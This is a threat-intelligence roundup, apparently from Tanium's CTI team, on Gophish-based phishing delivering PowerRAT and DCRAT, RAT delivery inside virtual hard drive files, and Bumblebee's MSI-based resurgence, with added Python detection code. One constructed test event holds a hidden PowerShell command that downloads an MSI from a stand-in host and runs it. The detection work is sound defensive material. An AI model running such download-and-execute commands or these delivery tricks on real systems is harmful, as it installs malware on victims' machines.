
CTI Roundup: Gophish Toolkit Phishing, Malicious Virtual Hard Drive Files, Return of Bumblebee Malware

Threat actor uses the Gophish toolkit in phishing campaigns, attackers bypass secure email gateways and antivirus scanners, and Bumblebee malware returns

Emerging Issue

This week, CTI explores how a threat actor is leveraging an open-source toolkit called Gophish to conduct phishing campaigns. Next up, CTI investigates how threat actors are embedding malicious content within virtual hard drive files to bypass secure email gateways (SEGs) and antivirus tools. Finally, CTI provides an update on the notorious Bumblebee malware, which appears to be making a resurgence.

Threat actor uses the Gophish toolkit in phishing campaigns

A recent campaign uses modular infection chains that begin with either a maldoc (malicious document) or an HTML file; both require interaction from the victim to kick off the rest of the infection chain. Researchers have also discovered a previously undocumented PowerShell RAT (remote access trojan) in the attack.

Using the Gophish toolkit

Cisco Talos analyzed the malicious links within these phishing emails and identified the attacker-controlled domains hosting a malicious Microsoft Word document and an HTML file.

The domain resolves to an IP address confirmed as an AWS EC2 instance. The same server also reverse-resolves to another domain that delivers malicious HTML files with embedded JavaScript. It was determined that the actor hosted the Gophish toolkit on this server, listening on port 3333.

A multi-modular campaign

The campaign has two initial attack vectors:

  1. The first attack vector is a malicious Word document.
  2. The second attack vector involves using HTML files with embedded malicious JavaScript.

Maldoc-based infection to deliver PowerRAT

In this infection chain, the victim must open the malicious Word document and enable the “view contents” button in the document banner. This action enables the malicious VB (Visual Basic) macro program to execute.

The actor strategically embedded a base64-encoded data blob in the document but set its text color to match the document background so it would not be visible. The macro drops a malicious .hta (HTML application) file and a PowerShell loader onto the victim’s machine.

Cisco Talos also discovered a new PowerShell RAT as one of the payloads executed in this infection chain. The tool executes in memory and can run additional PowerShell scripts and commands. It performs reconnaissance, collects information, writes data to memory, and exfiltrates it.

HTML-based infection to deliver DCRAT

In this example, the actor uses HTML files embedded with malicious JavaScript.

When the victim clicks a link in the phishing email, the HTML file opens on the machine and its embedded JavaScript executes, downloading a .zip archive.

The victim must manually unzip the archive and run the executable inside it, which masquerades as the legitimate VK messenger application. This action ultimately results in a DCRAT infection.

Analyst comments from Tanium’s Cyber Threat Intelligence team

Both of the actor’s infection chains require some level of interaction on the user’s part to successfully kick off the rest of the attack.

A growing number of attacks rely on user interaction, like the ClickFix attacks that require users to paste and execute a malicious command.

It’s a little surprising to see so many campaigns reliant on user interaction since this leaves room for the attack to be unsuccessful. This is a key example of where user awareness and training can be critical.

Attackers bypass SEGs and antivirus scanners

Cofense discovered that threat actors are embedding malicious content within virtual hard drive files to avoid detection by SEGs and antivirus solutions.

Campaign trends

Cofense observed virtual hard drive files being leveraged as a delivery mechanism in multiple campaigns throughout 2024. The lures vary for each campaign, but all seem to be delivering Remcos RAT and/or XWorm RAT.

  • May 2024 campaign: This campaign used phishing emails containing a link that pretended to be a relevant tax document but downloaded a virtual hard drive file instead. After downloading the file, the victim would run the main payload that would deliver Remcos RAT.
  • June/July 2024 campaign: In this campaign, phishing emails pretended to be from Canada Post and various other postal services. The emails carried attached .zip archives under the guise of a package label but actually contained a virtual hard drive file. Opening the virtual hard drive file would convince the victim to open a malicious LNK file that would ultimately deliver a DotNETLoader and XWorm RAT, which would then deliver Remcos RAT.
  • August 2024 campaign: In August, actors targeted victims with attached .zip archives supposedly containing several curriculum vitae for review, but the archives actually contained the same virtual hard drive file and a Visual Basic Script file that would run Remcos RAT in memory. This campaign included autorun.inf files, which are configuration files used by older Windows versions to “define actions that can be automatically performed when the volume is mounted.” In these older Windows versions (prior to Windows Vista), the files can be abused to run malware automatically.

Bypassing SEGs

Virtual hard drive files can be delivered via links to legitimate file-sharing services to bypass SEGs. However, they also seem able to bypass SEGs on their own.

Many SEGs are unable to scan virtual hard drive files at all. Those that can often rely on antivirus engines that also struggle to detect malicious content inside disk images. In the curriculum vitae-themed campaign described above, the actors bypassed Cisco, Proofpoint, and FireEye SEGs.
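One reason these attachments slip past scanners is that the disk image is often judged by its name rather than its content. The following added example (not code from Cofense or the original roundup) identifies VHD and VHDX images by their format signatures, looking one level into a ZIP attachment as in the package-label lure; the sample VHD and ZIP it builds are constructed stand-ins, not real malicious files.

```python
import io
import zipfile
from typing import List, Optional, Tuple

# Signatures from the public VHD/VHDX formats: a fixed-size VHD ends with a
# 512-byte footer whose first 8 bytes are the cookie "conectix"; a dynamic VHD
# also keeps a copy of that footer at offset 0; a VHDX starts with "vhdxfile".
VHD_COOKIE = b"conectix"
VHDX_SIGNATURE = b"vhdxfile"


def classify_disk_image(data: bytes) -> Optional[str]:
    """Return 'vhd', 'vhdx' or None from content alone, ignoring the file name."""
    if data[:8] == VHDX_SIGNATURE:
        return "vhdx"
    if data[:8] == VHD_COOKIE:
        return "vhd"
    if len(data) >= 512 and data[-512:-504] == VHD_COOKIE:
        return "vhd"
    return None


def find_disk_images(name: str, data: bytes) -> List[Tuple[str, str]]:
    """Report (path, type) for disk images in an attachment, looking one level
    into ZIP archives, as with the 'package label' archives described above."""
    if data[:4] != b"PK\x03\x04":
        kind = classify_disk_image(data)
        return [(name, kind)] if kind else []
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            kind = classify_disk_image(zf.read(info))
            if kind:
                hits.append((f"{name}/{info.filename}", kind))
    return hits


def build_sample_vhd(sectors: int = 4) -> bytes:
    """Constructed stand-in for a fixed-size VHD: zeroed sectors plus a footer
    carrying only the cookie (enough for signature checks, not a usable disk)."""
    return b"\x00" * (512 * sectors) + VHD_COOKIE + b"\x00" * 504


def build_sample_zip() -> bytes:
    """Constructed lure: a ZIP whose 'label' is really a VHD renamed to .pdf."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("label.pdf", build_sample_vhd())
        zf.writestr("readme.txt", b"Your package label is attached.")
    return buf.getvalue()
```

A gateway check built this way flags the image regardless of the extension it was given; the zip walk can be extended to nested archives and to other container formats the same way.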

Analyst comments from Tanium’s Cyber Threat Intelligence team

It’s not a total shock that threat actors are looking for new ways of delivering malicious content, especially one capable of bypassing many email security solutions.

This is similar to when threat actors pivoted to using QR codes in phishing emails — a technique known as “quishing” — that is still common. Right now, these virtual hard drive files seem capable of bypassing some solutions, which will likely make other threat actors interested in leveraging these files in their attacks.

Because of this, we will probably see vendors begin to investigate ways to provide effective detection of these malicious files, as we are seeing with QR code phishing.


Bumblebee malware returns after disruption

Researchers have spotted the notorious Bumblebee malware loader in recent attacks, indicating a possible resurgence.

These observations come just a few months after international law enforcement seized several servers worldwide, impacting multiple malware loader operations, including Bumblebee.

Initial access

Researchers believe these latest attacks begin with a phishing email that tricks victims into downloading a malicious .zip file. The .zip file contains an LNK file that will kick off the attack and result in the execution of the Bumblebee payload in memory.

LNK and PowerShell

Like past Bumblebee campaigns, this latest campaign uses LNK files and PowerShell. In this campaign, the LNK file was used as a downloader that would fetch and execute the next stage.

When the LNK file is opened, it executes a PowerShell command to download an MSI file. The file is saved as %AppData%\y.msi and run using msiexec.
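The LNK-to-PowerShell-to-msiexec chain described above is visible in process-creation telemetry. The following added example (not code from Netskope or the original roundup) runs a parent/child check over constructed, Sysmon-like events: it flags msiexec launched by PowerShell with an .msi under a user's AppData tree, as with the %AppData%\y.msi stage. The event shapes, PIDs, paths and the example.invalid host are all constructed for illustration.

```python
import re
from typing import Dict, List

# Constructed process-creation events in a Sysmon-like shape (not real telemetry).
# The chain mirrors the one described above: a LNK launched from Explorer starts
# PowerShell, which fetches an MSI into %AppData% and runs it with msiexec.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 4120, "ppid": 1200, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"pid": 5300, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -w hidden -c "iwr http://example.invalid/a -OutFile $env:AppData\y.msi; msiexec /i $env:AppData\y.msi"'},
    {"pid": 5344, "ppid": 5300, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /i C:\Users\victim\AppData\Roaming\y.msi"},
    # Benign control: an installer run from Downloads by Explorer, not PowerShell.
    {"pid": 6100, "ppid": 4120, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /i C:\Users\victim\Downloads\tool.msi"},
]

# An .msi path under a user's AppData tree, in expanded or environment-variable form.
APPDATA_MSI = re.compile(
    r"(?:%appdata%|\$env:appdata|\\appdata\\)[^\s\"']*\.msi\b", re.IGNORECASE)


def is_powershell(image: str) -> bool:
    return image.lower().endswith(("\\powershell.exe", "\\pwsh.exe"))


def is_msiexec(image: str) -> bool:
    return image.lower().endswith("\\msiexec.exe")


def find_msiexec_from_powershell(events: List[Dict]) -> List[Dict]:
    """Flag msiexec launches whose parent is PowerShell and whose command line
    references an .msi under AppData; returns one finding per matching event."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if not is_msiexec(e["image"]):
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or not is_powershell(parent["image"]):
            continue
        match = APPDATA_MSI.search(e["cmd"])
        if match:
            findings.append({"pid": e["pid"], "parent_pid": parent["pid"],
                             "msi": match.group(0)})
    return findings
```

The benign control event shows the two conditions working together: an installer from Downloads launched by Explorer is not flagged, while the same binary started by PowerShell with an AppData path is.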

New MSI approach

The Bumblebee malware family now appears to be delivering malware via MSI files. Other malware families like DarkGate and Latrodectus have also used MSI files to execute payloads.

Netskope looked at a few samples disguised as either NVIDIA or Midjourney installers. They were all observed loading and executing the payload in memory without dropping it to disk.

Bumblebee appears to be using a stealthy approach that avoids creating other processes. Netskope observed the malware using the MSI SelfReg table to force the execution of an export function: the table entry acts as a key identifying which file in the package to execute, which in the case Netskope observed was the final payload DLL, stored in a CAB file. Once the MSI installation begins, the DLL is loaded into the msiexec process, and the Bumblebee payload is unpacked and executed.

Bumblebee payload

Researchers identified some of the more well-known characteristics of the Bumblebee malware family in the unpacked payload. They determined that the configuration extraction approach is identical to previous Bumblebee versions.

Analyst comments from Tanium’s Cyber Threat Intelligence team

Netskope’s discovery of new campaigns involving the Bumblebee malware indicates a possible resurgence of the notorious malware family.

While disruption efforts from law enforcement agencies are certainly a step in the right direction, they’re not a permanent solution. Bumblebee was quite successful at its peak, making this potential resurgence something to keep an eye on.


Tanium CTI

Tanium's Cyber Threat Intelligence (CTI) analysts process and extract trends from the daily cyber landscape to curate and deliver current intel to stakeholders around threats impacting business and security.
